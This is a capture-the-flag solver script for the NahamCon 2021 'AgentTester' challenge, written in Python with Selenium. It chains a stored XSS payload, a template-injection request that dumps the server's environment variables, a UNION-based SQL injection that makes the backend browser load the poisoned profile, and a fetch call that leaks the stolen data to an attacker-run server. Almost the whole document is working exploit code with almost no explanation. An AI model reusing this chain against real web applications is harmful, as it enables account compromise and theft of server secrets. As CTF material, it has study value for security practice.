NahamCon 2021 CTF's AgentTester solver

Context: tweet.
Challenge source.
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string
import requests

def random_string(length):
  return ''.join(random.choices(string.ascii_uppercase + string.digits, k=length))

chall_url = "http://challenge.nahamcon.com:1337" # Change this
remote_server = "http://your.server" # Change this

username, password, uAgent = random_string(10), random_string(10), random_string(10)
email = f"{username}@{username}.com"

XSS = """"><script>fetch('/debug', {method: 'POST', headers: new Headers({'Content-Type': 'application/x-www-form-urlencoded'}), body: "code={{ environ }}"}).then(response => response.text()).then(data => fetch("%s/?leak="+encodeURIComponent(data)));</script>""" % remote_server

options = webdriver.ChromeOptions()
# options.add_argument('--headless')
options.add_argument('--no-sandbox')
options.add_argument("user-agent=%s" % uAgent)

# driver = webdriver.Remote("HUB_URL", options=options)
driver = webdriver.Chrome(options=options)

driver.get(chall_url + "/signup")

# Sing Up
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "usernameInput")))
driver.find_element_by_id("usernameInput").send_keys(username)
driver.find_element_by_id("emailInput").send_keys(email)
driver.find_element_by_id("password1Input").send_keys(password)
driver.find_element_by_id("password2Input").send_keys(password)
driver.find_element_by_xpath("//button[@type='submit']").click()

# Sign In
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "passwordInput")))
driver.find_element_by_id("usernameInput").send_keys(username)
driver.find_element_by_id("passwordInput").send_keys(password)
driver.find_element_by_id("submitButton").click()
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "userAgentInput")))

# Retrieve session cookie
session_cookie = driver.get_cookie('auth2')["value"]

# Submit XSS in /profile/<id>
driver.find_element_by_xpath("//a[contains(@href,'profile')]").click()
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "aboutInput")))
driver.find_element_by_id("aboutInput").send_keys(XSS)
profile_id = driver.current_url.split("/")[-1] # get profile ID
driver.find_element_by_xpath("//button[@type='submit']").click()
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "aboutInput")))

# SQLi to make the backend browser visit our profile
SQLi = """' UNION SELECT '%s', '%s' -- """ % (uAgent, f"{chall_url}/profile/{profile_id}")
driver.find_element_by_xpath("//span[contains(@class,'title')]").click()
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "userAgentInput")))
driver.find_element_by_id("userAgentInput").send_keys(SQLi)
driver.find_element_by_xpath("//button[@type='submit']").click()

while True:
  print("Making request to keep the profile cached... Check your logs!")
  print(requests.get(f"{chall_url}/profile/{profile_id}", cookies={'auth2': session_cookie}, headers={'User-Agent': uAgent}).headers)
NahamCon 2021 CTF’s AgentTester solver
